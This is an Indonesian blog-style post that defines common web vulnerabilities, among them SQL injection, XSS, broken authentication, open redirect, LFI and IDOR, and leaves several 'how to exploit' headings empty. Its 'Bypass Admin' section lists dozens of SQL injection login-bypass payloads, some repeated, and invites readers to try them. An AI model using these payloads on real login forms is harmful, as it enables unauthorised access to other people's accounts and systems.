Macam Macam Bug/Celah Kerentanan Pada Sebuah Website

 


Oke kembali lagi bersama gw MarioGanz Kali Ini gw bakal ngasih tau macam" bug/celah kerentanan pada sebuah website 


1. (SQL INJECTION) adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan


 yang terjadi dalam lapisan basis data sebuah aplikasi Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter" pelolos bentukan stringyang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain.





Cara reproduksi/exploitasi sql injection




2. (XSS > CROSS SITE SCRIPTING)




XSS merupakan kependekan yang digunakan untuk istilah cross site scripting.




XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.




Alasan kependekan yang digunakan XSS bukan CSS karena CSS sudah digunakan untuk cascade style sheet.




Cara reproduksi/exploitasi Cross site scripting






3. (BROKEN AUTHENTICATION)




Broken Authentication


Broken Authentication adalah serangan yang memanfaatkan kelemahan/kesalahan pada authentication, serangan ini biasanya ditemukan pada sistem login bisa memberi hacker akses ke akun user. Tidak hanya itu mereka bisa menguasai seluruh sistem dengan meng-hack akun admin. Untuk memitigasi kelemahan authentication, Anda bisa menggunakan 2-factor authentication (2FA).




Cara reproduksi/exploitasi broken authentication




4. (OPEN REDIRECT)




Open Redirection atau juga dikenal dengan "Unvalidated Redirects and Forwards" sebenarnya adalah celah yang banyak ditemukan selain bug XSS. Anehnya, masih banyak developer yang mengabaikan celah ini.




Sebenarnya apa sih bug Open Redirection?


Kerentanan ini memungkinkan attacker untuk mengarahkan pengunjung dari situs terpercaya ke situs malware atau phising tanpa autentifikasi dari admin situs. Bergantung pada arsitektur situs web yang rentan, pengalihan bisa terjadi setelah tindakan tertentu, seperti login, dan terkadang hal itu bisa terjadi seketika saat memuat sebuah halaman.


5.Bypass Admin


Bypass Admin adalah teknik dimana queri sql dipaksa dimasukan pada form login yang nantinya akan dibaca oleh komputer sebagai sebuah intruksi login (karena intruksinya memaksa, jadi tanpa user&pass pun komputer akan memprosesnya)

Apa Itu Query Nya?

Ada Banyak Jenis/Macam² Query/Payload Bypass Admin Yaitu

'or 1=1 limit 1 -- -+

'=' 'or'

or '1'='1

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

==

and 1=1--

and 1=1

' or 'one'='one--

' or 'one'='one

' and 'one'='one

' and 'one'='one--

1') and '1'='1--

admin' --

admin' #

admin'/*

or 1=1--

or 1=1#

or 1=1/*

) or '1'='1--

) or ('1'='1--

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'


Boleh Dicoba yah


6.Local File Inclusion


Jadi Local File Inclusion (LFI) adalah kerentanan yang umum ditemukan pada aplikasi web. 

Kerentanan ini ada ketika aplikasi web menyertakan file tanpa membersihkan input dengan benar,

 memungkinkan penyerang untuk menyertakan file lokal yang tersimpan di server agar dapat menjadi bagian dari proses eksekusi aplikasi.

 

 7. IDOR


IDOR atau Insecure Direct Object Reference 

adalah vulnerability yang sering muncul karena tidak adanya pengecekan hak akses user

 terhadap suatu objek (data).